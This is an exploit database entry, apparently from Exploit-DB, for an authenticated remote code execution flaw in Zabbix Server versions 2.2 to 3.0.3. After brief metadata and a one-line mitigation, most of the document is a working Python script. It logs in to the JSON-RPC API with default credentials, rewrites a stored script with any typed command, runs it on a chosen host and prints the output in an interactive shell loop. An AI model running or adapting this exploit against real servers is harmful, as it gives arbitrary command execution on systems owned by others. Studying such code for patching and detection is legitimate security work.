Zabbix RCE with API JSON-RPC

vendor:

Zabbix Server

by:

Alexander Gurin

7,5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Zabbix Server

Affected Version From: 2.2

Affected Version To: 3.0.3

Patch Exists: YES

Related CWE: N/A

CPE: a:zabbix:zabbix_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux (Debian, CentOS)

2016

Zabbix RCE with API JSON-RPC

This exploit allows an attacker to execute arbitrary code on a vulnerable Zabbix server using the API JSON-RPC. The exploit requires authentication and the attacker must know the hostid of the vulnerable server. The exploit was tested on Linux (Debian, CentOS) and works on Zabbix versions 2.2 - 3.0.3.

Mitigation:

Ensure that the Zabbix server is up to date and that all users have strong passwords.

Source

Exploit-DB raw data:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A

import requests
import json
import readline

ZABIX_ROOT = 'http://192.168.66.2'	### Zabbix IP-address
url = ZABIX_ROOT + '/api_jsonrpc.php'	### Don't edit

login = 'Admin'		### Zabbix login
password = 'zabbix'	### Zabbix password
hostid = '10084'	### Zabbix hostid

### auth
payload = {
   	"jsonrpc" : "2.0",
    "method" : "user.login",
    "params": {
    	'user': ""+login+"",
    	'password': ""+password+"",
    },
   	"auth" : None,
    "id" : 0,
}
headers = {
    'content-type': 'application/json',
}

auth  = requests.post(url, data=json.dumps(payload), headers=(headers))
auth = auth.json()

while True:
	cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
	if cmd == "" : print "Result of last command:"
	if cmd == "quit" : break

### update
	payload = {
		"jsonrpc": "2.0",
		"method": "script.update",
		"params": {
		    "scriptid": "1",
		    "command": ""+cmd+""
		},
		"auth" : auth['result'],
		"id" : 0,
	}

	cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))

### execute
	payload = {
		"jsonrpc": "2.0",
		"method": "script.execute",
		"params": {
		    "scriptid": "1",
		    "hostid": ""+hostid+""
		},
		"auth" : auth['result'],
		"id" : 0,
	}

	cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
	cmd_exe = cmd_exe.json()
	print cmd_exe["result"]["value"]